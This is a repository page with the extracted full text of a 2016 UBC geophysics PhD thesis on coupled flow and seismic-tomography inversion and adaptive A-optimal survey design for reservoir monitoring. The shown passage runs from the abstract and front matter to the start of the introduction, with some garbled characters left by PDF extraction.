[ "ssm_sde {bssm} R Documentation\n\n## Univariate state space model with continuous SDE dynamics\n\n### Description\n\nConstructs an object of class `ssm_sde` by defining the functions for the drift, diffusion and derivative of diffusion terms of univariate SDE, as well as the log-density of observation equation. We assume that the observations are measured at integer times (missing values are allowed).\n\n### Usage\n\n```ssm_sde(\ny,\ndrift,\ndiffusion,\nddiffusion,\nobs_pdf,\nprior_pdf,\ntheta,\nx0,\npositive\n)\n```\n\n### Arguments\n\n `y` Observations as univariate time series (or vector) of length n. `drift, diffusion, ddiffusion` An external pointers for the C++ functions which define the drift, diffusion and derivative of diffusion functions of SDE. `obs_pdf` An external pointer for the C++ function which computes the observational log-density given the the states and parameter vector theta. `prior_pdf` An external pointer for the C++ function which computes the prior log-density given the parameter vector theta. `theta` Parameter vector passed to all model functions. `x0` Fixed initial value for SDE at time 0. `positive` If `TRUE`, positivity constraint is forced by `abs` in Milstein scheme.\n\n### Details\n\nAs in case of `ssm_nlg` models, these general models need a bit more effort from the user, as you must provide the several small C++ snippets which define the model structure. See vignettes for an example and `cpp_example_model`.\n\n### Value\n\nAn object of class `ssm_sde`.\n\n### Examples\n\n```\n# Takes a while on CRAN\nlibrary(\"sde\")\nset.seed(1)\n# theta_0 = rho = 0.5\n# theta_1 = nu = 2\n# theta_2 = sigma = 0.3\nx <- sde.sim(t0 = 0, T = 50, X0 = 1, N = 50,\ndrift = expression(0.5 * (2 - x)),\nsigma = expression(0.3),\nsigma.x = expression(0))\ny <- rpois(50, exp(x[-1]))\n\n# source c++ snippets\npntrs <- cpp_example_model(\"sde_poisson_OU\")\n\nsde_model <- ssm_sde(y, pntrs\\$drift, pntrs\\$diffusion,\npntrs\\$ddiffusion, pntrs\\$obs_density, pntrs\\$prior,\nc(rho = 0.5, nu = 2, sigma = 0.3), 1, positive = FALSE)\n\nest <- particle_smoother(sde_model, L = 12, particles = 500)\n\nts.plot(cbind(x, est\\$alphahat,\nest\\$alphahat - 2*sqrt(c(est\\$Vt)),\nest\\$alphahat + 2*sqrt(c(est\\$Vt))),\ncol = c(2, 1, 1, 1), lty = c(1, 1, 2, 2))\n\n# Takes time with finer mesh, parallelization with IS-MCMC helps a lot\nout <- run_mcmc(sde_model, L_c = 4, L_f = 8,\nparticles = 50, iter = 2e4," ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6170736,"math_prob":0.99767554,"size":2138,"snap":"2021-43-2021-49","text_gpt3_token_len":660,"char_repetition_ratio":0.11246485,"word_repetition_ratio":0.05730659,"special_character_ratio":0.30729654,"punctuation_ratio":0.17391305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99918514,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-07T09:22:44Z\",\"WARC-Record-ID\":\"<urn:uuid:e5efb20f-31f8-4440-ae09-3979d48acc7c>\",\"Content-Length\":\"4162\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f217667f-20d7-4e5e-8255-01233d3dc18a>\",\"WARC-Concurrent-To\":\"<urn:uuid:b0dc63df-da7e-46d2-bf09-1576824da78e>\",\"WARC-IP-Address\":\"137.208.57.46\",\"WARC-Target-URI\":\"https://search.r-project.org/CRAN/refmans/bssm/html/ssm_sde.html\",\"WARC-Payload-Digest\":\"sha1:CMVXEEJSU3N5GND5MWZF7UTIFOCS4KIZ\",\"WARC-Block-Digest\":\"sha1:HIGPJMR47SXHPYYJOAKQ6L4F4XKNB3EC\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363337.27_warc_CC-MAIN-20211207075308-20211207105308-00156.warc.gz\"}"}
https://www.nature.com/articles/s41598-018-33526-4?error=cookies_not_supported&code=40232b38-05fc-4d0a-ab6f-b0a1e6784e92
[ "## Introduction\n\nEl-Niño1 is a phenomenon that sea-surface temperature (SST) in the equatorial Pacific east of 180° is warmer than usual (Fig. 1A), whereas during La-Niña, the SST is colder than usual (Fig. 1C). Coupled with this variability in SST, fluctuation in sea-level pressure (SLP) anomaly between east and west develops in the tropical Pacific (Fig. 1B,D). This is known as Southern Oscillation. These coupled air-sea phenomena are often referred to as El-Niño and Southern Oscillation (ENSO).\n\nENSO impacts global climate2 through atmospheric teleconnection3,4. Hence, ENSO has been studied intensively, and several theories5,6,7,8 of ENSO have been proposed. Seasonal ENSO forecast has been successfully performed on the basis of ENSO persistence: June-August anomaly persists and amplifies until the following winter in the northern hemisphere (February to March). However, the spring season that follows has almost no correlation with the previous winter (referred to as “spring barrier”)9,10, making long-term ENSO forecasting (beyond 1 year) difficult.\n\nFinding the relationship between ENSO and external forcings with known period and phase would contribute to the long-term forecast of ENSO. One of possible candidates for this is the 18.6-year period moon tidal cycle11 (henceforth, 18.6-yr cycle). The bi-decadal component of Pacific Decadal Oscillation12 (the first principal component of SST variability north of 20°N in the North Pacific, henceforth PDO) is known to be related to the 18.6-yr cycle13,14. Since the SST and SLP pattern of PDO is similar to ENSO12, PDO is also referred to as ENSO-like variability which affects global mean surface temperature as “hiatus”15 (global warming slowdown). ENSO could, thus, be related to the 18.6-yr cycle.\n\nThe 18.6-yr cycle is caused by the oscillation of the orbital surface of moon around the earth: the surface inclines 23.4° to the equatorial surface of earth on average and this inclination oscillates with the period of 18.613 years with the amplitude of 5.2°11. This 18.6-yr cycle causes the long-term modulation of oceanic tides where amplitudes of diurnal (semi-diurnal) components of K1 and O1 (M2) tides modulate by 11% and 19% (4%) respectively, and the amplitude modulation of the semi-diurnal M2 tide is out-of-phase from the diurnal (K1 and O1) tides11. This tidal modulation causes variations in oceanic vertical mixing variability, and could influence the oceanic and eventually climatic variability11,13.\n\nAn observational study has suggested the relationship between the 18.6-yr cycle and the timing of ENSO; stronger-than-usual El Niño events tend to occur during the periods of weak diurnal tide and low inclination of orbital surface of moon16. This is based on the information that NINO3.4 (5°S-5°N and 170°W-120°W) SST17 anomaly in the central-eastern equatorial Pacific (index for monitoring ENSO) is positive (Fig. S1A in Supplementary Information A), and the mean Southern Oscillation Index (SOI17: difference in normalized SLP, Tahiti (17°38′S, 149°27′W) minus Darwin (12°27′S, 130°50′E)) is negative (Fig. S1B) during the 5 (~18.6/4)-year period at around the minimum diurnal tide. However, when the 95% (90%) confidence interval is evaluated by $$1.96\\,(1.645)\\times \\sigma /\\sqrt{{N}_{c}},$$ where σ is the standard deviation and Nc is the degree of freedom, the means were not found to be significant. In the previous study, Nc were set at number of months16. 
However, monthly data cannot be considered independent due to the seasonal persistence of ENSO; thus the number of months is not an appropriate choice for the degrees of freedom, and the number of years should be used instead.

## Data and Methods

A composite analysis was performed in each tide year for the mature-phase (December–February: DJF) ENSO (NINO3.4, SOI and NINO1+2: 0–10°S, 90°W-80°W) time-series data17 of 1867–2015 (148 years). A 310-year-long (roughly doubled) DJF SOI time-series extending back to 1706 was also used, by adding the reconstructed proxy data18 based on tree-ring chronology for 1706–1866. The proxy data were adjusted (multiplied by 0.3) to the instrumental SOI17 over the overlapping period of 1867–1977, and the 310-year mean (−0.17) was then subtracted. The composite analysis was also applied to global SST19 and SLP20 data.

Year 0 was set at the maximum (minimum) diurnal (semi-diurnal) tide. In the 9th–10th years, the diurnal tide takes its minima. An El-Niño (La-Niña) tendency is indicated when the mean in a certain tide year is positive (negative) beyond the confidence interval of the mean. The 95% (90%) confidence interval of the mean was evaluated using the formula $$1.96\,(1.645)\times {\rm{\sigma }}/\sqrt{{N}_{c}},$$ where σ is the standard deviation and the degrees of freedom Nc ≈ N/18.6 is conservatively defined as the number of tidal cycles, with N the total number of data points (years).

The tide year after the maximum diurnal tide in the 18.6-yr cycle, YTide (= Y − Ymin, where Y is the year of the data and Ymin is the year of the nearest maximum diurnal tide satisfying Y ≥ Ymin), was evaluated as follows. Since the year 1969.25 had one of the maximum diurnal tides and the accurate period of the cycle is 18.613 years, the years Ymin of maximum diurnal tide were calculated by rounding (1969.25 + 18.613 × i + Ya) down to an integer, where i = 0, ±1, ±2, … and Ya = (7 − m)/12, with m (= 1, …, 12) for the 1st day of each month and m (= 1.5, 2.5, …, 12.5) for the 15th day of each month. Ya = 0.458 (= (7 − 1.5)/12) was used for the DJF mean time-series in the present study. The addition of Ya is necessary to accurately compute the nearest years of maximum tide for a given month of the data, because the interannual nature of ENSO variability influences the analysis and the tide year depends on the month and day of the data used. For example, Ymin near the maximum of 1969.25 is 1968 for data from 2 October to 31 December, and 1969 for data from 1 January to 1 October.

Even though some of the means were significantly different from zero, it would be too early to conclude that ENSO is related to the 18.6-yr tidal cycle. Even if ENSO occurred randomly, random time-series of limited data length could yield some significant means. Hence, to estimate the appearance probability of such significant means from random time-series (the so-called False Discovery Rate, FDR), Monte-Carlo simulations were performed using 100,000 pseudo time-series with the same 1-year-lag auto-correlation (r ~ ±0.04) (i.e., red spectra), data length, standard deviation and initial conditions as those of the ENSO time-series.
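The tide-year bookkeeping and the confidence interval above are simple enough to sketch in code. The following Python fragment is our own illustration (not from the paper's materials); the example year is a placeholder:

```python
import math

# Sketch of the tide-year computation and composite-mean confidence
# interval described above; variable names follow the text.

def tide_year(Y, Ya=0.458):
    """Years elapsed since the nearest maximum diurnal tide with Y >= Ymin."""
    i = 0
    while math.floor(1969.25 + 18.613 * (i + 1) + Ya) <= Y:
        i += 1                                   # scan forward past Y
    while math.floor(1969.25 + 18.613 * i + Ya) > Y:
        i -= 1                                   # scan backward to Ymin <= Y
    Ymin = math.floor(1969.25 + 18.613 * i + Ya)
    return Y - Ymin

def ci(sigma, N, level=1.96):
    """Half-width of the confidence interval with Nc ~ N/18.6 cycles."""
    Nc = N / 18.6
    return level * sigma / math.sqrt(Nc)

print(tide_year(1979))   # 10, the 10th tide year
```

tide_year(1979) returns 10, i.e., the tide year in which the Results below find the strongest El-Niño tendency.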
The time-series were generated using the formulation $$y(t)=r\times y\,(t-1)+{\sigma }_{W}\times \varepsilon (t)$$ where y(t) is the time series in year t, r is the 1-year-lag auto-correlation coefficient of the ENSO time-series, and $${\sigma }_{W}(={\sigma }_{R}\sqrt{1-{r}^{2}\,})$$ scales the normalized white noise ε(t) so that the pseudo series has the standard deviation σR of the ENSO time-series. Estimates of the FDR using an alternative standard method21, which may be too simple to be applied to this study, are described in Supplementary Information B and Table S1.

## Results

A significantly (at the 95% level) positive (negative) NINO3.4 SST, suggesting El-Niño (La-Niña), occurred in the 10th (3rd, 12th and 16th) year after the maximum diurnal tide in the 18.6-yr cycle (Fig. 2A), and a significantly (at the 95% level) negative (positive) SOI occurred in the 10th (3rd and 16th) year (Fig. 2B). For another ENSO index, the NINO1+2 SST for the eastern South Pacific off Peru, a positive (negative) anomaly occurred in the 1st and 10th (3rd, 12th and 16th) tide years (Fig. 2C; 90% significance for the 10th tide year and 95% for the other tide years). The 10th year for El-Niño and the 3rd and 16th years for La-Niña are common to those 3 ENSO indices over the 148 years, i.e., 8 cycles of the 18.6-yr period.

Horizontal anomaly distributions of DJF SST19 during 1854–2015 and SLP20 during 1860–2015 in the common 3rd, 10th and 16th tide years (Fig. 1) confirm the ENSO tendency indicated by the ENSO indices (Fig. 2). SST and SLP anomaly distributions in the tropical Pacific in the 1st (Fig. 3A,B) and 12th (Fig. 3C,D) tide years also confirm the ENSO tendency from the NINO1+2 SST (Fig. 2C for the 1st and 12th years) and the NINO3.4 SST (Fig. 2A for the 12th year).

Significantly negative (positive) means of the SOI, suggesting an El-Niño (La-Niña) tendency, were also found in the 310-year-long 1706–2015 DJF SOI time-series (Fig. 2D). A significantly negative (positive) SOI occurred in the 1st, 10th and 13th (3rd, 12th and 16th) years after the maximum diurnal tide (Fig. 2D). The horizontal SST and SLP patterns in the 13th tide year (Fig. 3E,F) confirm the El-Niño tendency.

The statistical significance of the present composite analysis was evaluated further, because random processes may generate significant means in relatively short time-series. Monte-Carlo simulations showed that 95%-significant means in 1, 2, 3, 4, 5, and 6 tide years appear with probabilities of 86, 57, 29, 11, 3.4, and 0.8%, respectively, in 148-year-long random pseudo time-series (Table 1A). The 3, 4, and 5 (4 at the 95% significance level and 1 at 90%) significant means corresponding to the SOI, NINO3.4 SST and NINO1+2 SST appear with probabilities of 29%, 11%, and 8%, respectively, in pseudo random time-series. Hence, it cannot be concluded that the relations between the 18.6-yr cycle and ENSO in the short (148-yr) time-series are significant at the 95% level.

In contrast, the four 95% and two 90% significant means in the 310-year-long SOI (Fig. 2D) appear with only 0.9% probability in random time-series, leading to the conclusion that ENSO is not completely random and is related to the 18.6-yr cycle at the 99% confidence level. Even when the 310-year mean (−0.17) was not subtracted from the time-series, the El-Niño (La-Niña) tendency in the 1st, 10th and 13th (3rd) tide years was still found to be significant at 95%, a pattern that appeared with only 3.3% probability (Table 1B).
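As a rough sketch of this Monte-Carlo procedure (our own illustration, not the paper's code; the tide-year binning is simplified to year mod 19, and 1,000 replicates stand in for the 100,000 used in the paper):

```python
import math, random

# Generate AR(1) pseudo time-series y(t) = r*y(t-1) + sigma_W*eps(t) and
# count how many of the 19 tide-year composite means exceed the 95% CI.

def pseudo_series(N, r, sigma_R):
    sigma_W = sigma_R * math.sqrt(1.0 - r * r)    # keeps the series std at sigma_R
    y = [random.gauss(0.0, sigma_R)]
    for _ in range(N - 1):
        y.append(r * y[-1] + sigma_W * random.gauss(0.0, 1.0))
    return y

def n_significant_means(y):
    N = len(y)
    sigma = math.sqrt(sum(v * v for v in y) / N)
    half_width = 1.96 * sigma / math.sqrt(N / 18.6)   # CI with Nc = N/18.6
    bins = {}
    for year, v in enumerate(y):
        bins.setdefault(year % 19, []).append(v)      # crude stand-in for Y - Ymin
    return sum(abs(sum(b) / len(b)) > half_width for b in bins.values())

random.seed(0)
counts = [n_significant_means(pseudo_series(310, 0.04, 1.0)) for _ in range(1000)]
print(sum(c >= 4 for c in counts) / len(counts))  # chance of >= 4 significant means
```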
The probability that the four 95% significant means are common (i.e., occur in the same tide years) between the short 148-year (Fig. 2A,C) and the long 310-year (Fig. 2D) time-series is 0.14% (Table 1C), further supporting the robustness of the relation between ENSO and the 18.6-yr cycle.

## Discussion

Although the physical mechanisms that explain the relation between ENSO and the 18.6-yr cycle are beyond the focus of the present study and are left to future studies, possible mechanisms are discussed here. A temporal-scale difference exists between the interannual ENSO and the bi-decadal 18.6-yr cycle. Variability at the frequency 5 × f18.6 (five times the 18.6-yr cycle frequency, i.e., with a period of 3.7 (= 18.6/5) years), which is particularly evident in the original proxy Stahle-SOI time-series (the blue curve in Fig. 2D has 5 maxima and 5 minima), may be generated through nonlinear dynamical processes and may resonate with equatorial waves5,6,7,8, which are bounded by the eastern and western coasts, to generate the relation between the interannual-scale ENSO and the 18.6-yr cycle. These processes need to be examined in future studies.

The second point of discussion is the location and mechanism of the 18.6-yr-period forcing. One possible location could be remote forcing from the mid-latitudes, and the other could be direct forcing in the tropical Pacific. The remote forcing was previously examined with an air-sea coupled climate model22 with locally enhanced vertical mixing, and its 18.6-yr-period variability, around the Kuril Straits, which border the North Pacific and the Okhotsk Sea. Anomalous stratification and currents generated around the Kuril Straits propagate along the western boundary as coastally trapped waves and modify the equatorial regions. This generates 18.6-yr-period ENSO-like (PDO) variability, with its peak in the 6th tide year for La-Niña-like (negative) PDO and the 15th year for El-Niño-like (positive) PDO. The relationship between this model PDO and the 18.6-yr cycle is similar to the previously observed one14. The enhanced tide-induced vertical mixing assumed in the climate model around the Kuril Straits was confirmed with direct turbulence observations23,24, and evidence of 18.6-yr water-mass variability has been reported in the subarctic North Pacific and marginal seas25,26,27,28,29. Another set of climate model experiments30, with a globally estimated distribution of tide-induced vertical mixing and its 18.6-yr modulation, also confirmed that the ENSO-like PDO variability occurs similarly to the earlier model22 and the observations14, but that model exhibits a weaker response in the equatorial and tropical Pacific. This might be because the direct forcing of the 18.6-yr cycle was underestimated in the model.

Evidence of the direct forcing of the 18.6-yr cycle in the equatorial Pacific was demonstrated in the de-trended (warming trend removed) August SST in the Indonesian seas during 1910–2015 (Fig. 4). August SST was used because ENSO develops during August, before strong air-sea interactions mask the influence of tidal mixing variability. In the Indonesian seas, where the semi-diurnal M2 tide is dominant and takes its maxima (minima) in the 9th (0th) tide year, negative (positive) SST caused by the enhanced (weakened) tide-induced mixing could lead to a positive (negative) SLP anomaly and thus to El-Niño (La-Niña). The 5-year running mean SST (red curve in Fig.
4) followed the 18.6-yr cycle with a 1/4-phase (about 5-year) lag, except for the low SST in the early 1990s, which corresponded to the 1991 Pinatubo eruption, after which El-Niño tended to occur31. This lag of several years is consistent with the La-Niña (El-Niño)-like PDO tendency in the 3rd–5th (10th–13th) tide years. The reasons for this lag need to be examined in future studies." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8933617,"math_prob":0.89085555,"size":24342,"snap":"2022-40-2023-06","text_gpt3_token_len":6715,"char_repetition_ratio":0.13374147,"word_repetition_ratio":0.03,"special_character_ratio":0.28111905,"punctuation_ratio":0.1641881,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96041,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-28T21:06:27Z\",\"WARC-Record-ID\":\"<urn:uuid:a538fb61-ff55-4ead-af93-8fd55ee0776f>\",\"Content-Length\":\"286553\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b4efdae-d5aa-4381-8ece-f1aa72b9af41>\",\"WARC-Concurrent-To\":\"<urn:uuid:2a25dad7-122f-4421-8cce-d313d6a57a44>\",\"WARC-IP-Address\":\"146.75.36.95\",\"WARC-Target-URI\":\"https://www.nature.com/articles/s41598-018-33526-4?error=cookies_not_supported&code=40232b38-05fc-4d0a-ab6f-b0a1e6784e92\",\"WARC-Payload-Digest\":\"sha1:X7JMBXQ4ZMU66C5EBFEQ3DLDWKL5DFZI\",\"WARC-Block-Digest\":\"sha1:YTXH53ZUBPH65ID64RBADIXHDDIRKOHY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499654.54_warc_CC-MAIN-20230128184907-20230128214907-00871.warc.gz\"}"}
https://open.library.ubc.ca/cIRcle/collections/ubctheses/24/items/1.0300491
[ "# Open Collections\n\n## UBC Theses and Dissertations", null, "## UBC Theses and Dissertations\n\n### Adaptive optimal experimental design and inversion of a coupled fluid flow and geophysical imaging model… Fohring, Jennifer 2016\n\nMedia\n24-ubc_2016_september_fohring_jennifer.pdf [ 4.28MB ]\nJSON: 24-1.0300491.json\nJSON-LD: 24-1.0300491-ld.json\nRDF/XML (Pretty): 24-1.0300491-rdf.xml\nRDF/JSON: 24-1.0300491-rdf.json\nTurtle: 24-1.0300491-turtle.txt\nN-Triples: 24-1.0300491-rdf-ntriples.txt\nOriginal Record: 24-1.0300491-source.json\nFull Text\n24-1.0300491-fulltext.txt\nCitation\n24-1.0300491.ris\n\n#### Full Text\n\n`Adaptive optimal experimental designand inversion of a coupled uid owand geophysical imaging model forreservoir monitoringbyJennifer FohringB.Sc., The University of British Columbia, 2011A THESIS SUBMITTED IN PARTIAL FULFILLMENT OFTHE REQUIREMENTS FOR THE DEGREE OFDOCTOR OF PHILOSOPHYinThe Faculty of Graduate and Postdoctoral Studies(Geophysics)THE UNIVERSITY OF BRITISH COLUMBIA(Vancouver)May 2016c Jennifer Fohring 2016AbstractImaging and prediction of uid ow within the subsurface provides information crucialto decision making processes in \felds such as groundwater management and enhancedoil recovery. The ow of a uid through a reservoir depends primarily on the perme-ability of the subsurface rock; a quantity that is often unknown throughout the entiredomain of the reservoir. One method for predicting ow is to estimate the permeabil-ity of the reservoir and simulate ow through a mathematical subsurface ow model.Given the model, ow data can be inverted to estimate the permeability. However,this inversion approach can lead to inaccurate results due to the sparse sampling ofow data, and thus inaccurate predictions.To acquire a higher sampling of data, geophysical survey techniques are appliedin order to e\u000eciently collect a higher density of data sampled at the surface. Thesedata are sensitive to changes to the geophysical properties of the reservoir due toow. Inversion of geophysical data then provides images of changes to the geophysicalproperties of the reservoir. In order to estimate the ow parameters using geophysicaldata, the two mathematical models require coupling.The thesis therefore proposes two approaches to improve the imaging and predic-tion of ow. First, a novel coupled inverse problem for estimating the uid velocity\feld and the initial geophysical property model from geophysical data is developed.Second, a new method of optimally designing the geophysical survey for the coupledinverse problem is developed. The new adaptive design approach builds on traditionalA-Optimal design methods such that historic data are included in the design algo-iiAbstractrithm. This produces designs that adapt with ow in the subsurface and reduce thecollection of unnecessary data. Both the coupled inverse problem and adaptive sur-vey design method are demonstrated using a seismic tomography geophysical surveyand a tracer advection uid ow model. Numerical examples show that the coupledapproach yields an improved ow estimate as well as improved image quality, whilethe adaptive optimal designs provide su\u000ecient geophysical data.iiiPrefaceThis thesis contains original research conducted while studying at the University ofBritish Columbia, resulting in two publications and one expanded conference pro-ceeding.The idea of the coupled inverse problem presented in Chapter 4 came originallyfrom conversations with Dr. Eldad Haber. 
The subsequent derivations, code implementation, numerical tests, and manuscript preparation were carried out in collaboration with Dr. Lars Ruthotto, a post doctoral researcher with Dr. Eldad Haber at the time. The work was published in Fohring, J., Haber, E., and Ruthotto, L. (2014). Geophysical imaging of fluid flow in porous media. SIAM Journal on Scientific Computing, 36(5):218-236, and various parts were adapted from an SEG conference proceeding (Fohring, J., Ruthotto, L., and Haber, E. (2013). Geophysical Imaging, Reservoir History Matching and Forecasting. In 2013 SEG Annual Meeting, Houston. Society of Exploration Geophysicists).

The idea of adaptive experimental design also resulted from conversations with Dr. Eldad Haber. The development of this idea is presented in Chapter 5. The subsequent derivations, code implementation, numerical tests, and manuscript preparation for adaptive optimal design were carried out by myself with contributions, input, and advice from Dr. Haber. The bulk of the text in Chapter 5 is adapted from the paper (Fohring, J. and Haber, E. (2016). Adaptive A-optimal experimental design for linear dynamical systems. SIAM Journal on Uncertainty Quantification, xx:1-19), which is still, at the time of writing, going through the review process.

Table of Contents

Abstract
Preface
Table of Contents
List of Figures
Acknowledgements
Dedication
1 Introduction
1.1 Reservoir characterization
1.2 Geophysics for reservoir characterization
1.3 Optimal survey design
1.4 Thesis objective and outline
2 A model reservoir monitoring experiment
2.1 Geophysics: seismic tomography
2.2 Dynamics: tracer advection
2.3 Physical parameter relations
2.4 Discretization
2.4.1 Discretization of the tomography equation
2.4.2 Discretization of the mass balance
2.4.3 Discretization of the flux-balance conservation
2.4.4 A Particle-In-Cell method for flow simulation
2.5 Summary
3 Error characterization and model estimation
3.1 Linear inversion
3.2 Coupled inversion and error characterization
3.2.1 Exact dynamics
3.2.2 Inexact dynamics
3.3 Summary
4 Coupled inversion for velocity and initial slowness
4.1 Flow constrained geophysical imaging
4.2 Discretization of regularization functionals
4.3 Numerical optimization
4.4 Initialization
4.5 Experimental setup
4.6 Sequential reconstruction as initialization
4.7 Joint reconstruction
4.8 Forecasting
4.9 Summary
5 Dynamic optimal experimental design
5.1 Adaptive experimental design
5.2 Design for dynamical systems
5.2.1 Exact dynamics
5.2.2 Inexact dynamics
5.3 Numerical optimization
5.3.1 Exact dynamics
5.3.2 Inexact dynamics
5.4 Numerical examples
5.4.1 Regularization
5.4.2 Monitor function
5.5 Design results: exact dynamics
5.6 Results: inexact dynamics
5.7 Summary
6 Conclusions
Bibliography

List of Figures

1.1 Model of a reservoir with minimal wells. Estimation of the permeability $k(\vec{x})$ using only pressure ($p$) and hydraulic head ($z$) data of a fluid moving with velocity $\vec{u}$, collected from sparsely distributed wells, will generate highly inaccurate results.

1.2 Model of a reservoir with geophysical survey measurement locations depicted in orange. Changes to the geophysical model parameters $m(\vec{x})$ can be estimated through inversion of the densely sampled geophysical data ($d_i$).

2.1 Tomography setting: sources ($s_i$) and receivers ($r_j$) are placed in two boreholes and the travel times of an acoustic wave traveling along adjoining ray paths $(i, j)$ are measured.

2.2 Tracer advection: Tracer of concentration ($c$) is advected in a fluid of density ($\rho$) with velocity field ($\vec{u}$). The hydraulic conductivity ($K$) determines the velocity field given a pressure gradient within the reservoir.

2.3 A grid cell with length $h_1$ and height $h_2$, slowness value ($m_j$) located at the cell center, and components of the fluid velocity flowing in ($\vec{u} = [u_1^+, u_2^+]$) and out ($\vec{u} = [u_1^-, u_2^-]$) on the cell edges.
2.4 Particle-In-Cell method for the advection and mass-conservation equation. A particle located at the cell-centered point $\vec{x}_A$ on the regular mesh is pushed forward with velocity $\vec{u}$ along the path $\vec{u}\Delta t$, to the non-grid point $\vec{x}_B$. The value (mass) associated with the particle is then transferred to the cell-centered grid points adjacent to $\vec{x}_B$ using interpolation weights.

4.1 Visualizations of the ground truth and reference hydraulic conductivity models and associated flow fields. The true and reference models are discretized on a 100×200 cell grid on a domain of 100 m depth by 200 m across. A static source, at 55 m depth on the left border, and a sink, at 65 m depth on the right border of the domain, are indicated by red. The reference model is a simplified model which interpolates borehole data between the two wells.

4.2 Visualization of ground truth data for the domain with dimensions 100 m (y direction) depth and 200 m (x direction) across (first column), individual reconstruction (second column) and results of the joint reconstruction approach. The first row visualizes the initial slowness ($m_0$). The second shows a quiver plot of the recovered velocity field ($\vec{u}$). The components of the velocity field $[u_x, u_y]$ are pictured in the third and fourth rows, and the last row shows the curl of the velocity field ($\nabla \times \vec{u}$). Note that there is almost no flow in the y direction, and that at the boundaries of the reservoir there are non-zero values of the curl of $\vec{u}$.

4.3 The evolution of the tracer is pictured for the ground truth (left column), the individual reconstruction used for initialization (middle column), and the proposed joint reconstruction. The tracer evolution is simulated for 40 days with the respective initial slowness and flow field. The front of the ground truth tracer is visualized by dashed lines for the first 3 rows. Note that the joint method results match the ground truth tracer front to a greater degree than the predictions from the initialization estimates.

5.1 Initial experiment setup. Tomography sources are pictured in green on the left and receivers in blue on the right. The initial setup covers the entire flow domain with 20 sources and 30 receivers. There is one source of fluid, pumped at a constant rate from the top green point, and a sink at the bottom (red) of the domain. Flow is in the downward direction.

5.2 Plot of the relative error ($\|m_1^{true} - \hat{m}_1\| / \|m_1^{true}\|$) versus the regularization parameter $\alpha$ for both the linear regularization and smoothed total variation. The TV regularization gives a better estimate of the model for the case of a sharp target.

5.3 Exact dynamics: plots of the adapted mean squared error (amse) vs. the number of nonzero weights (left column), and the weights used to conduct experiments 1, 3, and 5, at times $t_0, t_2, t_4$.

5.4 Exact dynamics: relative error plots. Model error is compared for each experiment for both the linear and TV regularization.

5.5 Exact dynamics: optimal designs and recovered models for 9 experiments.
The top row shows the rays and the recovered model, with the number of rays (#d = 297) given below, followed by the true models in the second row, the models recovered using total variation in the third row, and finally the models recovered using the linear gradient regularization.

5.6 Inexact dynamics: relative error plots. Model error is compared for each experiment for both the linear and TV regularization.

5.7 Inexact dynamics: optimal designs and recovered models for 9 experiments. The top row shows the rays and the recovered model, with the number of rays given below. The second row pictures the true models, the third shows the models recovered using total variation, and finally the bottom shows the models recovered using the linear gradient regularization.

Acknowledgements

This thesis would never have been possible without the guidance, assistance and support of a large group of individuals.

First and foremost, I would like to express my deepest gratitude to my supervisor Eldad Haber for all of the guidance, advice, and arguments he has provided. I have learned a great deal working with you over the past 6 years, not only about computational geophysics, but also about myself. Toda raba.

During my PhD I had the privilege of working at IBM with Lior Horesh. Thank you, Lior, for your kindness, encouragement, and for providing me with so many different explanations and perspectives on inverse problems and optimization. I am truly grateful for the time spent with you and your lovely family in New York.

And to Lars Ruthotto, the paper wouldn't have happened without you. I learned so much working with you. Thank you.

Many thanks to all of my office mates and colleagues; particularly Klara and Luz for your much appreciated reading and editing of my thesis, and for lending an ear to many questions, concerns, and complaints! And also to Gudni, Sarah, Justin, Kris, Mike, Mike, Dikun, Rowan, Seogi, and Lindsey, for help, encouragement, editing, and fun!

A very special thanks to my dear friends Marianne and JF: for campus lunches, hikes, dogs, skiing, beer, wine, rowing, science, and games.

And finally, thank you to my best friend and partner Dave Marchant. For everything.
For example, decisions such as fromwhich wells to extract, which wells to shut in, and from which wells to inject cana\u000bect production rates, uid loss, and overall e\u000eciency.One particular aspect of reservoir management programs involves predicting orforecasting uid ow within the subsurface. To do so, ow is simulated by building amathematical model of the subsurface, often referred to as reservoir characterization.1.1 Reservoir characterizationIn most cases, reservoirs consist of isolated regions of porous rock surrounded byregions of non-porous rock. See Figure 1.1 below for a diagram. Thus, the dynamicsof a reservoir are commonly governed by mathematical models describing uid owin a porous media, which come in many forms with varying degrees of complexity.11.1. Reservoir characterizationSome of the more common models include: single phase ow, two-phase ow, blackoil models, advection-di\u000busion models, and reactive contaminant transport models.For example, the model describing single phase ow in a porous media as presentedin (Chen et al., 2006), given the spatial and temporal variables~x and t, is as follows@(ffi\u001a)@t= r \u0001 (\u001a~u) + q; (1.1a)~u =k\u0016(rp \u001agrz): (1.1b)Equation 1.1a is derived by tracking mass conservation of a uid with viscosity \u0016owing through a rectangular three dimensional di\u000berential volume, see (Chen et al.,2006) for the complete derivation. The porosity of the rock (the fraction of a rep-resentative elementary volume available for uid) is denoted by ffi, and the densityof the uid by \u001a(t;~x). The velocity of the uid~u(~x) is de\fned as the super\fcialDarcy velocity, and described by Equation 1.1b, the conservation of momentum e-quation also known as Darcy's law. The ow in this model is generated by a pressuregradient, rp(t;~x), resulting from the sources and sinks, q, and from a gravitationalgradient, \u001agrz, where rz is the di\u000berence in uid heights, and g is the magnitude ofthe gravitational acceleration.If there is no compressibility in the rock then@(ffi\u001a)@t! 0, such that no uid is storedwithin the rock pore space. Additionally, the velocity depends on the permeabilitytensor k of the porous rock and the uid viscosity \u0016. The permeability is an averageproperty of the reservoir that measures the ability of a porous media to transmit uid.In most cases, k is a tensor, unless it is assumed that k(~x)11= k(~x)22= k(~x)33= k(~x).In this 